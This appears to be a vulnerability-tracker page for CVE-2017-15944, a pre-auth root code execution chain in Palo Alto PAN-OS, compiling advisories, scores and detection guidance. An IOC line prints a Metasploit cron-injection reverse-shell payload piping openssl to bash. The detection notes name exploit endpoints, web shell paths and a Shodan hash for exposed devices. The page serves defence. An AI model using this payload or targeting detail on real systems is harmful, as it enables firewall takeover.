CVE-2017-15944
Published 2017-12-11
CVE-2017-15944: Palo Alto Networks PAN-OS before 6.1.19, 7.0.x before 7.0.19, 7.1.x before 7.1.14, and 8.0.x before 8.0.6 allows remote attackers to execute arbitrary code via…
Priority: P1 · 99 · critical · 9.8 (CVSS 3.1)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Tags: KEV · ITW · EXPLOIT · Initial access
CISA Known Exploited Vulnerability, remediation due 2022-09-08
Exploited in the wild
EPSS: 98.34% (99.9th percentile)
Palo Alto Networks PAN-OS before 6.1.19, 7.0.x before 7.0.19, 7.1.x before 7.1.14, and 8.0.x before 8.0.6 allows remote attackers to execute arbitrary code via vectors involving the management interface.
Affected
5 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| paloalto | pan-os | — | — |
| paloaltonetworks | pan-os | < 6.1.19 | 6.1.19 |
| paloaltonetworks | pan-os | >= 7.0.0 < 7.0.19 | 7.0.19 |
| paloaltonetworks | pan-os | >= 7.1.0 < 7.1.14 | 7.1.14 |
| paloaltonetworks | pan-os | >= 8.0.0 < 8.0.6 | 8.0.6 |
Detection & IOCs (extracted from sources)
IOC (cron command-injection payload as staged by the Metasploit module): command* -print -exec bash -c openssl${IFS}s_client${IFS}-quiet${IFS}-connect${IFS}#{cbhost}:#{cbport}|bash ;
- Detect the authentication bypass trigger: monitor HTTP GET requests to /esp/cms_changeDeviceContext.esp containing the session-corruption payload pattern (single-quote + ";user|s.) in the device parameter.
- Detect exploitation of the XML injection / directory creation step: monitor HTTP POST requests to /php/utils/router.php containing 'Administrator.get' with 'async-mode' and directory traversal sequences (../../) in the JSON body.
- Alert on creation of or HTTP access to the web shell path /var/appweb/htdocs/api/c.php or /api/c.php on PAN-OS management interfaces.
- Alert on creation of the SUID root binary /bin/x on PAN-OS devices, which is dropped by the exploit payload.
- Monitor the cron-executed scripts /usr/local/bin/genindex_batch.sh and /usr/local/bin/genindex.sh for anomalous directory names under /opt/pancfg/mgmt/logdb/ containing shell metacharacters or -exec arguments, which indicate exploitation of the command injection in the cron script.
- Use Palo Alto Networks vulnerability signatures #40483 and #40484 (content update 756) applied to firewall rules protecting the management interface as an interim detection/mitigation control.
- Identify exposed PAN-OS management interfaces via Shodan using favicon hash -631559155 or FOFA icon_hash=-631559155.
- Detect the Metasploit module's reverse TLS staging callback: an outbound openssl s_client connection from the PAN-OS management plane to an external host, piped to bash.
Caveats from the sources:
- PAN-OS 8.0 (before 8.0.6) is patched but was NOT remotely exploitable by an unauthenticated user via this specific vulnerability chain; the unauthenticated pre-auth RCE path applies to PAN-OS 6.1.18 and earlier, 7.0.18 and earlier, and 7.1.13 and earlier.
- The exploit chain requires the web management interface to be reachable by the attacker; Palo Alto Networks recommends not exposing the management interface to the internet, which significantly reduces attack surface.
- The cron-based command injection stage fires every 15 minutes; exploitation can take up to 20 minutes end-to-end, so detection must account for delayed payload execution rather than immediate shell activity.
- The authentication bypass does NOT produce a fully valid logged-in session; most PHP scripts will still fail, but the panAuthCheck directive in the web server is bypassed, allowing access to specific protected PHP endpoints.
CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| nvd | v2.0 | 7.5 | HIGH | AV:N/AC:L/Au:N/C:P/I:P/A:P |
| vulncheck | — | 9.8 | CRITICAL | — |
| cisa | — | 9.8 | CRITICAL | — |
CISA
Palo Alto Networks PAN-OS Remote Code Execution Vulnerability
cisa·2022-08-18·CVSS 9.8
CVE-2017-15944 [CRITICAL] Palo Alto Networks PAN-OS Remote Code Execution Vulnerability
Vulnerability: Palo Alto Networks PAN-OS Remote Code Execution Vulnerability
Affected: Palo Alto Networks PAN-OS
Palo Alto Networks PAN-OS contains multiple, unspecified vulnerabilities which can allow for remote code execution when chained.
Required Action: Apply updates per vendor instructions.
Notes: https://security.paloaltonetworks.com/CVE-2017-15944; https://nvd.nist.gov/vuln/detail/CVE-2017-15944
Remediation Due Date: 2022-09-08
Palo Alto
Vulnerability in PAN-OS and Panorama on Management Interface
vendor_paloalto·2017-12-06·CVSS 9.8
CVE-2017-15944 [CRITICAL] Vulnerability in PAN-OS and Panorama on Management Interface
Through the exploitation of a combination of unrelated vulnerabilities, and via the management interface of the device, an attacker could remotely execute code on PAN-OS or Panorama in the context of the highest privileged user. (Ref # PAN-61094 / PAN-80990 / PAN-80993 / PAN-80994 / CVE-2017-15944)
PAN-OS and Panorama contain multiple vulnerabilities that, when exploited in conjunction, could lead to remote code execution prior to authentication.
This issue affects PAN-OS 6.1.18 and earlier, PAN-OS 7.0.18 and earlier, and PAN-OS 7.1.13 and earlier.
Affected products: PAN-OS
Solution: PAN-OS 6.1.19 and later, PAN-OS 7.0.19 and later, PAN-OS 7.1.14 and later. An update in PAN-OS 8.0.6 also includes patches related to this vulner
GHSA
GHSA-9ppr-hv62-39w2: Palo Alto Networks PAN-OS before 6
ghsa_unreviewed·2022-05-13
CVE-2017-15944 [CRITICAL] CWE-20 GHSA-9ppr-hv62-39w2: Palo Alto Networks PAN-OS before 6
Palo Alto Networks PAN-OS before 6.1.19, 7.0.x before 7.0.19, 7.1.x before 7.1.14, and 8.0.x before 8.0.6 allows remote attackers to execute arbitrary code via vectors involving the management interface.
VulnCheck
Palo Alto Networks PAN-OS Remote Code Execution Vulnerability
vulncheck·2017·CVSS 9.8
CVE-2017-15944 [CRITICAL] Palo Alto Networks PAN-OS Remote Code Execution Vulnerability
Palo Alto Networks PAN-OS contains multiple, unspecified vulnerabilities which can allow for remote code execution when chained.
Affected: Palo Alto Networks PAN-OS
Required Action: Apply updates per vendor instructions.
Exploitation References: https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-12-11&host_type=src&vulnerability=cve-2017-15944; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-12-25&host_type=src&vulnerability=cve-2017-15944; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-01-01&host_type=src&vulnerability=cve-2017-15944; http
No detection rules found.
Exploit-DB
Palo Alto Networks - 'readSessionVarsFromFile()' Session Corruption (Metasploit)
exploitdb·2018-05-08
CVE-2017-15944 Palo Alto Networks - 'readSessionVarsFromFile()' Session Corruption (Metasploit)
---
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
'Name' => 'Palo Alto Networks readSessionVarsFromFile() Session Corruption',
'Description' => %q{
This module exploits a chain of vulnerabilities in Palo Alto Networks products running
PAN-OS versions prior to 6.1.19, 7.0.19, 7.1.14, and 8.0.6. This chain starts by using
an authentication bypass flaw to exploit an XML injection issue, which is then
abused to create an arbitrary directory, and finally gains root code execution by
exploiting a vulnerable cron script. This module uses an initial reverse TLS callback
to stage arbitrary payloads on the targ
Exploit-DB
Palo Alto Networks Firewalls - Root Remote Code Execution
exploitdb·2017-12-14·CVSS 9.8
CVE-2017-15944 [CRITICAL] Palo Alto Networks Firewalls - Root Remote Code Execution
---
This is a public advisory for CVE-2017-15944 which is a remote root code
execution bug in Palo Alto Networks firewalls.
Three separate bugs can be used together to remotely execute commands as
root through the web management interface without authentication on: PAN-OS
6.1.18 and earlier, PAN-OS 7.0.18 and earlier, PAN-OS 7.1.13 and earlier,
PAN-OS 8.0.5 and earlier.
Palo Alto Networks recommends not exposing the web management interface to
the internet. By looking at Project Sonar or Shodan it is evident that it's
actually quite common to deploy the firewalls with the web management
interface listening on the WAN port.
PAN-OS 6.1.19, PAN-OS 7.0.19, PAN-OS 7.1.14 and PAN-OS 8.0.6 are patched
and can be downloaded from https:
Metasploit
Palo Alto Networks readSessionVarsFromFile() Session Corruption
metasploit
This module exploits a chain of vulnerabilities in Palo Alto Networks products running PAN-OS versions prior to 6.1.19, 7.0.19, 7.1.14, and 8.0.6. This chain starts by using an authentication bypass flaw to exploit an XML injection issue, which is then abused to create an arbitrary directory, and finally gains root code execution by exploiting a vulnerable cron script. This module uses an initial reverse TLS callback to stage arbitrary payloads on the target appliance. The cron job used for the final payload runs every 15 minutes by default and exploitation can take up to 20 minutes.
Nuclei
Palo Alto Network PAN-OS - Remote Code Execution
nuclei·CVSS 9.8
CVE-2017-15944 [CRITICAL] Palo Alto Network PAN-OS - Remote Code Execution
Palo Alto Network PAN-OS and Panorama before 6.1.19, 7.0.x before 7.0.19, 7.1.x before 7.1.14, and 8.0.x before 8.0.6 allows remote attackers to execute arbitrary code via vectors involving the management interface.
Template:
id: CVE-2017-15944
info:
  name: Palo Alto Network PAN-OS - Remote Code Execution
  author: emadshanab,milo2012
  severity: critical
  description: Palo Alto Network PAN-OS and Panorama before 6.1.19, 7.0.x before 7.0.19, 7.1.x before 7.1.14, and 8.0.x before 8.0.6 allows remote attackers to execute arbitrary code via vectors involving the management interface.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
  remediation: |
    Apply the latest sec
No writeups or analysis indexed.
References
- http://www.securityfocus.com/bid/102079
- http://www.securitytracker.com/id/1040007
- https://security.paloaltonetworks.com/CVE-2017-15944
- https://www.exploit-db.com/exploits/43342/
- https://www.exploit-db.com/exploits/44597/
- https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2017-15944
Timeline
- Published: 2017-12-11
- Added to CISA KEV: 2022-08-18
- Exploited in the wild